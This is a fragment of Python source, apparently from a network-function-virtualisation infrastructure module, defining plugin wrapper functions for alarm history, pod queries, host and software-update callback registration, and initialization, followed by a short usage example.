def nfvi_get_alarm_history(start_period, end_period, callback):
"""
    Get alarm history
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_alarm_history', start_period,
end_period, callback=callback)
return cmd_id
def nfvi_get_terminating_pods(host_name, callback):
"""
Get terminating pods
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_terminating_pods',
host_name, callback=callback)
return cmd_id
def nfvi_register_host_add_callback(callback):
"""
Register for host add notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_add_callback',
callback=callback)
def nfvi_register_host_action_callback(callback):
"""
Register for host action notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_action_callback',
callback=callback)
def nfvi_register_host_state_change_callback(callback):
"""
Register for host state change notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_state_change_callback',
callback=callback)
def nfvi_register_host_get_callback(callback):
"""
Register for host get notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_get_callback',
callback=callback)
def nfvi_register_host_upgrade_callback(callback):
"""
Register for host upgrade notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_upgrade_callback',
callback=callback)
def nfvi_register_host_update_callback(callback):
"""
Register for host update notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_update_callback',
callback=callback)
def nfvi_register_host_notification_callback(callback):
"""
Register for host notifications
"""
_infrastructure_plugin.invoke_plugin('register_host_notification_callback',
callback=callback)
def nfvi_register_sw_update_get_callback(callback):
"""
Register for software update get notifications
"""
_infrastructure_plugin.invoke_plugin('register_sw_update_get_callback',
callback=callback)
def nfvi_infrastructure_initialize(config, pool):
"""
Initialize the NFVI infrastructure package
"""
global _infrastructure_plugin
_infrastructure_plugin = NFVIInfrastructurePlugin(config['namespace'], pool)
_infrastructure_plugin.initialize(config['config_file'])
def nfvi_infrastructure_finalize():
"""
Finalize the NFVI infrastructure package
"""
if _infrastructure_plugin is not None:
_infrastructure_plugin.finalize()
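A hedged sketch of the initialize-then-invoke flow this module expects. The config keys match nfvi_infrastructure_initialize above, but the namespace, config file path, and pool argument are placeholders; the real values come from the VIM configuration and its worker pool.

# Illustrative only
def _on_hosts(response):
    # The response structure is defined by the underlying plugin and is
    # treated here as opaque
    print("hosts response:", response)

config = {'namespace': 'example.namespace', 'config_file': '/etc/nfv/nfv_plugins.conf'}
nfvi_infrastructure_initialize(config, pool=None)  # pool: assumed to be a worker/task pool
cmd_id = nfvi_get_hosts(_on_hosts)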
| 29.373942
| 84
| 0.619297
|